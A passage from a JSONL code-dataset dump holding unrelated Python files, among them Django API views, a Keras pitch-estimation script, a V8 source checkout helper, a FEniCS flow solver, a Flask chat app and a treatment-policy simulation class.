time.sleep(1)\n\n # additional wait in case we need to ensure the release of resources, like replication slots\n time.sleep(wait_secs)\n\n return resp\n\n\ndef stop_all_jobs():\n for job in get_jobs():\n stop_job(job['name'])\n\n\ndef upload_keytab(principal, keytab_file):\n global _SSB_CSRF_TOKEN\n data = {\n 'keytab_principal': principal,\n 'csrf_token': _SSB_CSRF_TOKEN,\n }\n files = {'keytab_file': (os.path.basename(keytab_file), open(keytab_file, 'rb'), 'application/octet-stream')}\n return _api_post('/keytab/upload', api_type=_API_UI, data=data, files=files, token=True)\n","sub_path":"setup/terraform/resources/labs/utils/ssb.py","file_name":"ssb.py","file_ext":"py","file_size_in_byte":9824,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"327631313","text":"from django.shortcuts import render\nfrom rest_framework.generics import ListAPIView,RetrieveAPIView,RetrieveUpdateAPIView,DestroyAPIView,CreateAPIView\nfrom .serializers import Etiqueta,EtiquetaSerializer\nfrom apps.user.permissions import IsOwner\nfrom rest_framework.permissions import IsAuthenticated\nfrom rest_framework.mixins import DestroyModelMixin,UpdateModelMixin\n\n\n\n\nclass EtiquetaList(ListAPIView):\n serializer_class = EtiquetaSerializer\n permission_classes = [IsAuthenticated]\n\n def get_queryset(self,*args,**kwargs):\n queryset_list = Etiqueta.objects.filter(user = self.request.user)\n return queryset_list\n\n\nclass EtiquetaCreate(CreateAPIView):\n queryset = Etiqueta.objects.all()\n serializer_class = EtiquetaSerializer\n permission_classes = [IsAuthenticated]\n\n def perform_create(self,serializer):\n serializer.save(user = self.request.user)\n\n\nclass EtiquetaDetail(DestroyModelMixin, UpdateModelMixin, RetrieveAPIView):\n queryset = Etiqueta.objects.all()\n lookup_field = \"pk\"\n serializer_class = EtiquetaSerializer\n permission_classes = [IsAuthenticated,IsOwner]\n\n def put(self,request,*args,**kwargs):\n return self.update(request,*args,**kwargs)\n\n def delete(self,request,*args,**kwargs):\n return self.destroy(request,*args,**kwargs)\n\n\n\n","sub_path":"apps/etiqueta/APIviews.py","file_name":"APIviews.py","file_ext":"py","file_size_in_byte":1321,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"281406728","text":"import argparse\nimport gzip\nimport os\nimport sys\n\nimport matplotlib.cm\nfrom mir_eval.melody import *\nfrom numpy.lib.stride_tricks import as_strided\nfrom resampy import resample\nfrom scipy.io import wavfile\n\nfrom datasets import to_local_average_cents, to_viterbi_cents\n\nparser = argparse.ArgumentParser()\nparser.add_argument('model',\n help='path to the HDF5 file that contains the Keras model')\nparser.add_argument('input_path',\n help='path that contains .wav or .npy.gz files to run the model on')\nparser.add_argument('output_path', nargs='?', default=None,\n help='path to save the prediction and salience results (default: same as input_path)')\nparser.add_argument('--save-numpy', action='store_true',\n help='save the salience representation to .npy file as well')\nparser.add_argument('--truth-path', default=None,\n help='path to the corresponding .csv or .npy.gz files that contains the ground-truth annotations')\nparser.add_argument('--viterbi', action='store_true',\n help='run Viterbi decoding for finding the center frequencies')\nargs = parser.parse_args()\n\nif args.output_path is None:\n args.output_path = args.input_path\n\n\ndef wav_stream(files):\n for file in files:\n srate, data = wavfile.read(os.path.join(args.input_path, file))\n if len(data.shape) == 2:\n data = data.mean(axis=1)\n if srate != 16000:\n data = resample(data, srate, 16000)\n srate = 16000\n hop_length = int(srate / 100)\n n_frames = 1 + int((len(data) - 1024) / hop_length)\n frames = as_strided(data, shape=(1024, n_frames),\n strides=(data.itemsize, hop_length * data.itemsize))\n frames = frames.transpose().astype(np.float32)\n yield (file, frames)\n\n\ndef npygz_stream(files):\n for file in files:\n with gzip.open(os.path.join(args.input_path, file)) as f:\n yield (file, np.load(f).transpose())\n\n\nfiles = [file for file in os.listdir(args.input_path) if file.lower().endswith('.wav')]\nfiles.sort()\nnum_files = len(files)\nif num_files > 0:\n print(num_files, \"wav files found\")\n stream = wav_stream(files)\nelse:\n files = [file for file in os.listdir(args.input_path) if file.lower().endswith('.npy.gz')]\n files.sort()\n num_files = len(files)\n if num_files > 0:\n print(num_files, \".npy.gz files found\")\n stream = npygz_stream(files)\n else:\n raise ValueError(\"No .wav or .npy.gz files found in \", args.input_path)\n\n\nimport keras # noqa\n\nmodel = keras.models.load_model(args.model)\nmodel.summary()\n\ninferno = matplotlib.cm.get_cmap('inferno')\nviridis = matplotlib.cm.get_cmap('viridis')\njet = matplotlib.cm.get_cmap('jet')\n\n\naccuracy_files = [os.path.join(args.output_path, 'accuracies-%.2f.csv' % f) for f in np.arange(0.40, 0.95, 0.05)]\nfor accuracy_file in accuracy_files:\n with open(accuracy_file, \"w\") as f:\n print(\"NAME,RPA,RCA,VR,VFA,OA\", file=f)\n\n\ndef report_accuracy(name, truth, estimated, confidence):\n for accuracy_file, tau in zip(accuracy_files, np.arange(0.40, 0.95, 0.05)):\n ref_voicing = truth != 0\n est_voicing = confidence > tau\n\n rpa = raw_pitch_accuracy(ref_voicing, truth, est_voicing, estimated)\n rca = raw_chroma_accuracy(ref_voicing, truth, est_voicing, estimated)\n recall, false_alarm = voicing_measures(ref_voicing, est_voicing)\n oa = overall_accuracy(ref_voicing, truth, est_voicing, estimated)\n\n with open(accuracy_file, \"a\") as f:\n print(\"{},{},{},{},{},{}\".format(name, rpa, rca, recall, false_alarm, oa), file=f)\n\n\nfor name, data in stream:\n print('processing', name, 'of shape', data.shape)\n data -= np.mean(data, axis=1)[:, np.newaxis]\n data /= np.std(data, axis=1)[:, np.newaxis]\n predictions = model.predict(data, verbose=True)\n if args.viterbi:\n cents = to_viterbi_cents(predictions)\n else:\n cents = to_local_average_cents(predictions)\n confidence = np.max(predictions, axis=1)\n hertz = 10.0 * 2 ** (cents / 1200.0)\n timestamps = 0.01 * np.array(range(hertz.shape[0]))\n result = np.vstack([timestamps, hertz, confidence]).transpose()\n result_file = os.path.join(args.output_path, name + '.f0.csv')\n np.savetxt(result_file, result, fmt='%.6f', delimiter=',', header='time,frequency,confidence')\n\n if args.save_numpy:\n salience_file = os.path.join(args.output_path, name + '.salience.npy')\n np.save(salience_file, predictions)\n\n predictions = np.flip(predictions, axis=1) # to draw the low pitches in the bottom\n\n figure_file = os.path.join(args.output_path, name + '.salience.png')\n image = inferno(predictions.transpose())\n image = np.pad(image, [(0, 20), (0, 0), (0, 0)], mode='constant')\n image[-20:-10, :, :] = viridis(confidence)[np.newaxis, :, :]\n image[-10:, :, :] = viridis((confidence > 0.5).astype(np.float))[np.newaxis, :, :]\n scipy.misc.imsave(figure_file, 255 * image)\n\n if args.truth_path:\n basename = name.replace('.npy.gz', '')\n csv_path = os.path.join(args.truth_path, basename + '.csv')\n npygz_path = os.path.join(args.truth_path, basename + '.npy.gz')\n if os.path.isfile(csv_path):\n truth = np.loadtxt(csv_path)\n elif os.path.isfile(npygz_path):\n with gzip.open(npygz_path) as f:\n truth = np.load(f)\n else:\n print('truth file for {} not found'.format(name), file=sys.stderr)\n truth = hz2cents(truth)\n report_accuracy(name, truth, cents, confidence)\n\n image = scipy.misc.imread(figure_file, mode='RGB')\n image = np.pad(image, [(20, 0), (0, 0), (0, 0)], mode='constant')\n\n for i in range(image.shape[1]):\n if truth[i] < 1:\n continue # no-voice\n image[:20, i, :] = 255 * np.array(jet(int(abs(truth[i] - cents[i]))))[:3]\n\n scipy.misc.imsave(figure_file.replace('.png', '.eval.png'), image)\n","sub_path":"runmodel.py","file_name":"runmodel.py","file_ext":"py","file_size_in_byte":6042,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"257178250","text":"#!/usr/bin/env python3\n\n# Author: Jamie Giannini\n\n# Objectives: Create a Python script that performs the following:\n\n# [X] Prompt the user to type a string input as the variable for your destination URL\n# [X] Prompt the user to select a HTTP Method of the following options: \n# [X] GET\n# [X] POST\n# [X] PUT\n# [X] DELETE\n# [X] HEAD\n# [X] PATCH\n# [X] OPTIONS\n# [X] Print to the screen the entire request your script is about to send. Ask the user to confirm before proceeding.\n# [X] Using the requests library, perform a GET request against your lab web server.\n# [X] For the given header, translate the codes into plain terms that print to the screen; for example, a ‘404’ error should print ‘Site not found’ to the terminal instead of ‘404’.\n# [X] For the given URL, print response header information to the screen\n\nimport requests #imports necessary library\n\ndef run_request():\n destination_flag = 0\n r = True\n user_destination = input(\"\\nPlease enter a destination URL:\\n\")\n user_method = input(\"\\nChoose a HTTP Method: [G] GET | [P] POST | [PU] PUT | [D] Delete | [H] HEAD | [PA] PATCH | [O] OPTIONS | [Q] Quit:\\n\")\n \n while r:\n if destination_flag == 0:\n print(\"\\nPlease confirm the following details: \")\n \n print(\"Your destination: \" + user_destination)\n # Translates entry into full name for better UX\n if user_method == \"G\" or user_method == \"g\":\n user_method_easy = \"GET\"\n elif user_method == \"P\" or user_method == \"p\":\n user_method_easy = \"POST\"\n print(\"(Note: Since you selected Post, for testing purposes we will use https://httpbin.org/post)\")\n elif user_method == \"PU\" or user_method == \"pu\":\n user_method_easy = \"PUT\"\n elif user_method == \"D\" or user_method == \"d\":\n user_method_easy = \"DELETE\"\n elif user_method == \"H\" or user_method == \"h\":\n user_method_easy = \"HEAD\"\n elif user_method == \"PA\" or user_method == \"pa\":\n user_method_easy = \"PATCH\"\n elif user_method == \"O\" or user_method == \"o\":\n user_method_easy = \"OPTIONS\" \n elif user_method == \"Q\" or user_method == \"q\":\n break\n \n print(\"Your choosen HTTP Method: \" + user_method_easy)\n\n user_choice = input(\"\\nSelect: [1] edit destination | [2] edit HTTP Method | [3] Continue:\\n\")\n \n if user_choice == \"1\":\n destination_flag = 1\n continue\n elif user_choice == \"2\":\n destination_flag = 2\n continue\n elif user_choice == \"3\":\n destination_flag = 3\n continue\n \n elif destination_flag == 1:\n user_destination = input(\"\\nPlease enter a destination URL:\\n\")\n destination_flag-=1\n continue\n\n elif destination_flag == 2:\n user_method = input(\"\\nChoose a HTTP Method: [G] GET | [P] POST | [PU] PUT | [D] Delete | [H] HEAD | [PA] PATCH | [O] Options | [Q] Quit:\\n\")\n destination_flag-=2\n continue\n \n #Perform request\n elif destination_flag == 3:\n if user_method == \"G\" or user_method == \"g\":\n reply = requests.get(\"http://\"+user_destination)\n print(\"\\nResults:\")\n if reply.status_code == 200:\n print(\"Success!\")\n print(\"\\nHeader data: \\n\"+str(reply.headers)) # Also print request header data\n elif reply.status_code == 301:\n print(\"Moved Permanently.\")\n elif reply.status_code == 302:\n print(\"Moved Temporarily.\")\n elif reply.status_code == 403:\n print('Forbidden.')\n elif reply.status_code == 404:\n print('Site Not Found.')\n elif reply.status_code == 500:\n print('Internal Server Error.')\n elif reply.status_code == 503:\n print('Server Unavailable.')\n else:\n print(\"Error\")\n break\n #Playing with POST\n elif user_method == \"P\" or user_method == \"p\":\n get_key = input(\"\\nProvide a key:\\n\")\n get_value = input(\"\\nProvide a value:\\n\")\n # Using HTTPbin for testing\n reply = requests.post('https://httpbin.org/post', data={get_key:get_value})\n print(\"\\nHeaders: \"+str(reply.request.headers))\n print(\"\\nURL: \"+str(reply.request.url))\n print(\"\\nBody: \"+str(reply.request.body))\n break\n #Catch all for anything not GET or POST for now\n elif user_method != \"G\" and user_method != \"g\" and user_method != \"P\" and user_method != \"p\":\n print(\"Other HTTP Methods Still In Development. Coming soon!\")\n break\n#main\nrun_request()\n\n\n#Resource: https://realpython.com/python-requests/#the-get-request\n\n\n \n \n \n \n \n \n\n\n","sub_path":"ops_challenge_12.py","file_name":"ops_challenge_12.py","file_ext":"py","file_size_in_byte":5256,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"285634487","text":"# Checking out the V8 source code: https://v8.dev/docs/source-code\n\nfrom .common import *\nimport sys\nimport os\nimport shutil\nimport urllib.request\n\ndef install_depot_tools(root=os.getcwd(), skip_intall_if_exists=True):\n out_path = os.path.join(root, \"depot_tools\")\n if os.path.exists(out_path):\n if os.path.isdir(out_path):\n if not skip_intall_if_exists:\n os.removedirs(out_path)\n else:\n os.remove(out_path)\n if os.path.exists(out_path) and skip_intall_if_exists:\n return out_path\n if sys.platform == \"win32\":\n url = \"https://storage.googleapis.com/chrome-infra/depot_tools.zip\"\n zip_path = os.path.join(root, \"depot_tools.zip\")\n with urllib.request.urlopen(url) as i:\n with open(zip_path, \"wb\") as o:\n o.write(i.read())\n shutil.unpack_archive(zip_path, out_path)\n os.remove(zip_path)\n else:\n url = \"https://chromium.googlesource.com/chromium/tools/depot_tools.git\"\n run(\"git\", \"clone\", url, cwd=root)\n return out_path\n\ndef update_depot_tools(root=os.getcwd()):\n run_cmd(\"gclient\", cwd=root, root=root)\n\ndef v8_src_downloaded(root=os.getcwd()):\n gclient_path = os.path.join(root, \".gclient\")\n if os.path.exists(gclient_path):\n with open(gclient_path, \"r\") as gclient:\n return gclient.read().find('\"name\": \"v8\"') != -1\n return False\n\ndef get_v8_src_code(root=os.getcwd()):\n run_cmd(\"fetch\", \"v8\", cwd=root, root=root, print_result=True)\n\ndef download_all_build_deps(root=os.getcwd()):\n run_cmd(\"gclient\", \"sync\", cwd=root, root=root, print_result=True)\n\ndef switch_to_version(version, root=os.getcwd()):\n v8_path = os.path.join(root, \"v8\")\n run_cmd(\"git\", \"checkout\", \"tags/{0}\".format(version), cwd=v8_path, root=root, print_result=True)\n\ndef download_additional_build_deps(root=os.getcwd()):\n if sys.platform == \"linux\":\n script_path = os.path.join(root, \"v8\", \"build\", \"install-build-deps.sh\")\n run_cmd(script_path, cwd=root, root=root, print_result=True)\n\ndef checkout(version, root=os.getcwd()):\n print_colored(\"Checking out the V8 source code...\")\n print_colored(\"See https://v8.dev/docs/source-code for more information.\")\n if not v8_src_downloaded(root=root):\n print_colored(\"Installing depot_tools...\")\n install_depot_tools(root=root)\n print_colored(\"Updating depot_tools... This may take some time.\")\n update_depot_tools(root=root)\n print_colored(\"Retrieving V8 source code...\")\n get_v8_src_code(root=root)\n print_colored(\"Downloading all the build dependencies...\")\n download_all_build_deps(root=root)\n print_colored(\"Downloading additional build dependencies...\")\n download_additional_build_deps(root=root)\n print_colored(\"Switch to version {0}\".format(version))\n switch_to_version(version, root=root)\n","sub_path":"bootstrap/checkout.py","file_name":"checkout.py","file_ext":"py","file_size_in_byte":2908,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"617333899","text":"from django import forms\nfrom django.utils.translation import ugettext_lazy as _\nfrom .models import Reservation\n\n\nclass ReservationForm(forms.ModelForm):\n class Meta:\n model = Reservation\n fields = ('amount', 'email', 'message', 'title', 'location')\n error_messages = {\n 'sender': {\n 'invalid': _('Enter a valid email address.'),\n 'required': _('Enter a valid email address.')\n }\n }\n","sub_path":"server/prices/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":467,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"404612336","text":"from openpyxl import Workbook\n\nwb = Workbook()\nsheet = wb.active\nsheet.title = \"New Shit\"\nsheet['C3'] = 'Hello world!'\nfor i in range(10):\n sheet[\"A%d\" % (i + 1)].value = i + 1\n\nwb.save('保存一个新的excel.xlsx')\n","sub_path":"aaaaaa/scrabe/excel-test.py","file_name":"excel-test.py","file_ext":"py","file_size_in_byte":221,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"502050298","text":"####################################################\n# Copyright (C) 2019 Sam Pickell\n# Last Updated December 9, 2019\n# Draw_and_Get_Coord.py\n####################################################\n# The following Turtle Graphics implementation was obtained from this tutorial:\n# https://techwithtim.net/tutorials/python-module-walk-throughs/turtle-module/drawing-with-mouse/\n# It has been modified and added to so that it reports the mouse's coordinates when drawing\n\n# Using Turtle Graphics\nimport turtle\nfrom turtle import *\n\n# Global variable that sets the number of datapoints to collect\nLOOP_THRESHOLD = 20\n\n# Create screen and turtle variables\nout_screen = Screen()\nmy_turtle = Turtle(\"turtle\")\nmy_turtle.speed(-1)\n\n# Create two lists to store X and Y coordinates\nx_coords = []\ny_coords = []\n\n# Draw function\ndef turtle_draw(x, y):\n my_turtle.ondrag(None)\n my_turtle.setheading(my_turtle.towards(x, y))\n my_turtle.goto(x, y)\n my_turtle.ondrag(turtle_draw)\n\n # Ensure 0 is always positive\n if(x == -0.0):\n x = 0.0\n\n # Append the x coordinate to the end of the list\n x_coords.append(x)\n\n # Ensure 0 is always positive\n if(y == -0.0):\n y = 0.0\n\n # Append the y coordinate to the end of the list\n y_coords.append(y)\n\n # End drawing session after a certain threshold is reached\n if(len(x_coords) >= LOOP_THRESHOLD):\n turtle.bye()\n\n\n# The main function\ndef main():\n\n turtle.listen()\n\n my_turtle.ondrag(turtle_draw)\n\n out_screen.mainloop()\n\nmain()\nprint('X coordinates: ', len(x_coords))\nprint('Y coordinates: ', len(y_coords))\n","sub_path":"Draw_and_Get_Coord.py","file_name":"Draw_and_Get_Coord.py","file_ext":"py","file_size_in_byte":1611,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"17431699","text":"#Designer: Andreas Slyngstad\n#Progamming Language: Python\n#Solver of the Navier-Stokes equation using Chorins method\nfrom dolfin import *\na, b = 1, 5.0\nnx = 10 # Nodes in x direction\nny = 10 # Nodes in y direction\ntop = 1\n#Define Mesh and Functions\nmesh = RectangleMesh(1, 0, 4, top, nx, ny, \"crossed\")\nV = VectorFunctionSpace(mesh, 'CG', 2)\nu = TrialFunction(V)\nv = TestFunction(V)\n\n#Variational Problem\na = inner(nabla_grad(u), nabla_grad(v))*dx \nL = inner(Constant((0.0,0.0)),v)*dx\n\n#Boundary Conditions\nclass Top(SubDomain):\n\tdef inside(self, x, on_boundary):\n\t\ttol = 1E-14\n\t\treturn on_boundary and x[1] > 1-tol \n\nclass Bottom(SubDomain):\n\tdef inside(self, x, on_boundary):\n\t\ttol = 1E-14\n\t\treturn on_boundary and x[1] < tol\n\n#Test position of boundary plot(boundaries); interactive()\ntop = Top() ;bottom = Bottom()\nboundaries = FacetFunction('size_t', mesh)\nboundaries.set_all(0)\ntop.mark(boundaries,1); bottom.mark(boundaries,2)\n\nbctop = DirichletBC(V, Constant((1.0,0.0)), boundaries, 1)\nbcbottom = DirichletBC(V, Constant((0.0,0.0)),boundaries, 2)\nbcs = [bctop, bcbottom]\n\nu_ = Function(V)\nsolve(a == L, u_, bcs)\n\nplot(u_)\ninteractive()\n","sub_path":"NavierStokes/Navier.py","file_name":"Navier.py","file_ext":"py","file_size_in_byte":1145,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"373142065","text":"import os\n\nfrom flask import Flask,render_template,request, redirect,url_for,jsonify\n\nfrom flask_socketio import SocketIO, emit\n\n\napp = Flask(__name__)\napp.config[\"SECRET_KEY\"] = os.getenv(\"SECRET_KEY\")\nsocketio = SocketIO(app)\n\nchannels={} #Dict of lists, key-channel-username, value-list of messages\n\n@app.route(\"/\",methods=['GET','POST'])\ndef index():\n log_in_message=''\n username=request.form.get('username')\n if username not in channels:\n channels[username]=[]\n return redirect(url_for('chat'))\n else:\n log_in_message='You need to enter valid username'\n return render_template ('index.html', log_in_message=log_in_message)\n\n@app.route(\"/chat\",methods=['GET','POST'])\ndef chat():\n return render_template ('chatroom.html',chats=channels)\n\n@app.route(\"/my\",methods=['GET','POST'])\ndef my():\n data=channels\n return render_template ('channel2.html',data=data) \n\n# @app.route(\"/posts\",methods=['POST'])\n# def posts():\n# username=request.get_json(force=True, silent=True)['username'] \n# data=channels[username]\n# # return jsonify(data)\n# return render_template ('channel2.html', data=data) \n \n\n@socketio.on(\"new_messages\")\ndef message(json,methods=['GET','POST']):\n username=json['username']\n message=json['message']\n channels[username].append(message)\n print(channels)\n socketio.emit('response',json,broadcast=True)\n \n \n ","sub_path":"project2/application.py","file_name":"application.py","file_ext":"py","file_size_in_byte":1404,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"109810858","text":"import numpy as np\nimport pandas as pd\nfrom collections import defaultdict, Counter\nfrom scipy.optimize import minimize\nfrom sklearn.model_selection import KFold, train_test_split\nfrom sklearn.preprocessing import MinMaxScaler, StandardScaler\n\n#######\n\nclass simulation:\n def __init__(self, optimal_decision_rule, Q0, VF, objective_function, x_distr, balanced = False, n=2000):\n self.O = optimal_decision_rule\n self.Q0 = Q0\n self.VF = VF\n self.objective_function = objective_function\n self.x_distr = x_distr\n self.X_dict = defaultdict(list)\n self.X_dict_train = {}\n self.X_dict_val = {}\n self.X_dict_test = {}\n self.X_scaled_dict = defaultdict(list)\n self.y_dict = {}\n self.rewards_dict = {}\n self.total_rewards_dict = {}\n self.optimal_dict = {}\n self.optimal_decisions_dict = {}\n self.propensity_scores = {i: 0.5 for i in range(n)}\n self.scaler = MinMaxScaler()\n self.n = n\n self.l = None\n self.S = None\n self.smooth_clip = False\n self.intercept = False\n self.penalty_norm = False\n self.miss_min = []\n self.beta_callback = []\n self.balanced = balanced\n \n def generate_data(self, *x_distr_args):\n np.random.seed(48)\n for i in range(self.n):\n if self.balanced:\n num_measurements = 4\n else:\n num_measurements = int(np.random.uniform(1, 5, 1)[-1])\n self.X_dict[i] = self.x_distr(*x_distr_args, size = (num_measurements, 3))\n self.y_dict[i] = np.sign(np.random.binomial(1, 0.5, num_measurements))\n self.optimal_dict[i] = np.array([self.O(x) for x in self.X_dict[i]])\n self.optimal_decisions_dict[i] = np.array([np.sign(x) for x in self.optimal_dict[i]])\n self.rewards_dict[i] = [np.random.normal(self.Q0(x, o, a), 1) \n for x, o, a in zip(self.X_dict[i], self.optimal_decisions_dict[i], self.y_dict[i])]\n self.total_rewards_dict[i] = np.sum(self.rewards_dict[i])\n\n x_master = self.X_dict[0]\n for k in range(1, self.n):\n x_master = np.concatenate([x_master, np.array(self.X_dict[k])], axis = 0) \n self.scaler.fit(x_master) \n for k in self.X_dict:\n self.X_scaled_dict[k] = self.scaler.transform(np.array(self.X_dict[k]))\n\n \n def obtain_results(self, betas, X_dict_test, correct_min_count = None):\n X_dict_test_original = {k: self.X_dict[k] for k in X_dict_test}\n optimal_vf = self.VF(X_dict_test_original, X_dict_test_original, self.O)\n obs_vf = self.VF(X_dict_test_original, X_dict_test_original, lambda x, pid, idx: self.y_dict[pid][idx])\n assign_rate = round(np.sum([np.sum(self.optimal_decisions_dict[k] > 0) for k in self.optimal_decisions_dict]) /\\\n sum([len(o) for o in self.optimal_decisions_dict.values()]) * 100, 2)\n \n if not self.intercept:\n estimated_vf = self.VF(X_dict_test_original, X_dict_test, lambda x, pid, idx: np.dot(betas, x))\n success_rate = round(np.sum([np.all(np.sign(X_dict_test[k].dot(betas)) == self.optimal_decisions_dict[k]) \n for k in X_dict_test]) / len(X_dict_test) * 100, 2)\n else:\n estimated_vf = self.VF(X_dict_test_original, X_dict_test, lambda x, pid, idx: np.dot(betas, np.hstack([1, x])))\n success_rate = round(np.sum([np.all(np.sign(np.concatenate([np.ones(shape=(X_dict_test[k].shape[0], 1)),\n X_dict_test[k]], axis = 1).dot(betas)) == self.optimal_decisions_dict[k]) \n for k in X_dict_test]) / len(X_dict_test) * 100, 2)\n min_accuracy = round(correct_min_count[1] / correct_min_count[0] * 100, 2) if correct_min_count is not None else np.nan\n result_df = pd.DataFrame({\"l\": [self.l],\n 'S': [self.S],\n 'MinAccuracy': [min_accuracy],\n \"Assign_Rate\": [assign_rate], \n \"Accuracy\": [success_rate], \n \"OptimalVF\": [optimal_vf],\n \"EstimatedVF\": [estimated_vf], \n \"ObservedVF\": [obs_vf],\n 'Betas': \" \".join([str(round(b, 2)) for b in betas])})\n return result_df\n\n\n def optimize(self, l = 0.5, S=1, x0=None, verbose = False, scale = False, smooth_clip = True, \n lb = -1, up = 1, intercept = 0, penalty_norm = False):\n self.l, self.S, self.smooth_clip, self.intercept, self.penalty_norm = l, S, smooth_clip, intercept != 0, penalty_norm\n train_idx, test_idx = train_test_split(list(range(self.n)), test_size = 0.2, random_state = 48)\n train_idx, val_idx = train_test_split(train_idx, test_size = 0.2, random_state = 48)\n X_dict = self.X_dict if not scale else self.X_scaled_dict\n self.X_dict_train = {k: X_dict[k] for k in train_idx}\n self.X_dict_val = {k: X_dict[k] for k in val_idx}\n self.X_dict_test = {k: X_dict[k] for k in test_idx}\n \n x0 = np.ones(len(self.X_dict[0][0])) if x0 is None else x0\n x0 = np.hstack([intercept, x0]) if intercept != 0 else x0\n correct_min_count = [0, 0]\n self.miss_min = []\n self.beta_callback = [x0]\n sim_results = minimize(self.objective_function, x0=x0,\n args = (self.X_dict_train, self.y_dict, self.total_rewards_dict, \n self.propensity_scores, l, S, self.smooth_clip, \n correct_min_count, self.miss_min, self.intercept, penalty_norm),\n method = 'L-BFGS-B', bounds = [(lb, up) for i in range(len(x0))], callback = lambda x: self.beta_callback.append(x),\n options = {'disp': True, 'maxiter': 15000, 'ftol':1e-09, 'gtol':1e-09, \n 'eps': 1e-08, 'maxls': 20, 'maxcor': 10, 'maxfun': 15000})\n \n betas = sim_results.x\n result_df = self.obtain_results(betas, self.X_dict_val, correct_min_count)\n if verbose:\n display(results_df)\n return result_df\n \n def model_test_results(self, betas, scale = False):\n test_results = self.obtain_results(betas, self.X_dict_test)\n return test_results\n \n def cross_validation(self, l = 0.5, s = 1, x0 = None, verbose = False, scale = False, smooth_clip = True):\n self.l, self.S, self.smooth_clip = l, S, smooth_clip\n kf = KFold(n_splits=5)\n cv_results = pd.DataFrame()\n X_dict = self.X_dict if not scale else self.X_scaled_dict\n x0 = np.ones(len(self.X_dict[0][0])) if x0 is None else x0\n self.miss_min = []\n for train_idx, test_idx in kf.split(list(range(self.n))):\n X_dict_train = {k: X_dict[k] for k in train_idx}\n X_dict_test = {k: X_dict[k] for k in test_idx}\n correct_min_count = [0, 0]\n sim_results = minimize(self.objective_function, x0 = x0, \n args = (X_dict_train, self.y_dict, self.total_rewards_dict, \n self.propensity_scores, l, S, self.smooth_clip, correct_min_count, self.miss_min), \n method = 'BFGS', tol = 1e-3, options = {\"maxiter\": 1000})\n betas = sim_results.x\n cv_result = pd.concat([cv_result, self.obtain_results(betas, self.X_dict_test)], axis = 0)\n return cv_result, cv_result.mean().to_frame().transpose()\n \n \n def reset_data(self, n, x_distr):\n self.n = n\n self.x_distr = x_distr\n self.X_dict = defaultdict(list)\n self.X_dict_train = {}\n self.X_dict_val = {}\n self.X_dict_test = {}\n self.X_scaled_dict = defaultdict(list)\n self.y_dict = {}\n self.rewards_dict = {}\n self.total_rewards_dict = {}\n self.optimal_dict = {}\n self.optimal_decisions_dict = {}\n self.propensity_scores = {i: 0.5 for i in range(n)}\n self.scaler = MinMaxScaler()\n \n def reset_optimal_decision_rule(self, decision = None):\n self.O = decision\n \n def reset_VF(self, VF = None):\n self.VF = VF\n \n def reset_Q0(self, Q0 = None):\n self.Q0 = Q0\n \n def reset_objective_function(self, objective_funcion = None):\n self.objective_function = objective_function\n \n def reset_l(self, l = None):\n self.l = l\n \n def reset(self, S = None):\n self.S = S\n \n def reset_all(self, n, x_distr, decision = None, VF = None, Q0 = None, objective_funcion = None, l = None, S = None):\n self.clear_data(n, x_distr)\n self.reset_optimal_decision_rule(decision)\n self.reset_VF(VF)\n self.reset_Q0(Q0)\n self.reset_objective_function(objective_funcion)\n self.reset_l(l)\n self.reset_S(S)\n self.smooth_clip = False\n self.intercept = False\n self.penalty_norm = False\n self.miss_min = []\n self.beta_callback = []","sub_path":"scalable_softmin.py","file_name":"scalable_softmin.py","file_ext":"py","file_size_in_byte":9308,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"9763692","text":"from deap import tools\n\nfrom heft.algs.common.individuals import ListBasedIndividual\nfrom heft.algs.ga.coevolution.cga import Env, Specie\nfrom heft.algs.ga.coevolution.operators import MAPPING_SPECIE, ORDERING_SPECIE, fitness_mapping_and_ordering, build_schedule, mapping_all_mutate, assign_from_transfer_overhead, mapping_heft_based_initialize, default_build_solutions\nfrom heft.core.CommonComponents.ExperimentalManagers import ExperimentResourceManager, ExperimentEstimator\nfrom heft.core.environment.Utility import wf\nfrom heft.experiments.cga.cga_exp import hamming_distances, os_ideal_ind, ms_ideal_ind, do_experiment, unique_individuals, to_seq, hamming_for_best_components, best_components_itself, pcm, gdm, tourn, \\\n extract_mapping_from_ga_file, extract_ordering_from_ga_file\nfrom heft.experiments.cga.utilities.common import UniqueNameSaver, repeat, ArchivedSelector, build_ms_ideal_ind, build_os_ideal_ind\nfrom heft.settings import __root_path__\nfrom heft.core.environment import Utility\n\n\n_wf = wf(\"Montage_100\")\nrm = ExperimentResourceManager(rg.r([10, 15, 25, 30]))\nestimator = ExperimentEstimator(None, ideal_flops=20, transfer_time=100)\n\nselector = ArchivedSelector(5)(tourn)\n\nms_ideal_ind = build_ms_ideal_ind(_wf, rm)\nos_ideal_ind = build_os_ideal_ind(_wf)\n\nos_representative = extract_ordering_from_ga_file(\"{0}/temp/ga_schedule_full_439_tr100_m100.json\".format(__root_path__))\n\nheft_mapping = extract_mapping_from_ga_file(\"{0}/temp/heft_etalon_full_tr100_m100.json\".format(__root_path__), rm)\n\nsaver = UniqueNameSaver(\"../../temp/cga_fixed_ordering\")\n\ndef do_exp():\n config = {\n \"interact_individuals_count\": 100,\n \"generations\": 300,\n \"env\": Env(_wf, rm, estimator),\n \"species\": [Specie(name=MAPPING_SPECIE, pop_size=50,\n cxb=0.9, mb=0.9,\n mate=lambda env, child1, child2: tools.cxOnePoint(child1, child2),\n # mutate=mapping_default_mutate,\n # mutate=lambda ctx, mutant: mapping_k_mutate(ctx, 3, mutant)\n mutate=mapping_all_mutate,\n # 